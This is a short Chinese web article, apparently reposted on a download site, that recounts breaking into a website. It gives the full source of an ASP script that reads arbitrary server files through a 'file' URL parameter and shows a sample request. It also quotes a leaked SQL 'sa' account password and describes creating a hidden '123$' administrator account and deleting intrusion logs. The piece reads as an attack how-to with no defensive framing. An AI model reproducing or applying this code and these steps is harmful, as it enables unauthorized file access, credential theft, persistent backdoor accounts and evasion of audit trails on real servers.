黑客是如何突破一流检测系统的
番茄系统家园 · 2021-11-04 01:15:35
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "
" & server.HTMLEncode(myfile.readall) &"
"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
http://www.***.com/view.asp?file=D:\wwwroot\index.asp
读取到的敏感内容
sql地址:...
帐号:sa 密码:u8f2444f
利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/198114YehPYb.html。猜你喜欢
最新应用
热门应用

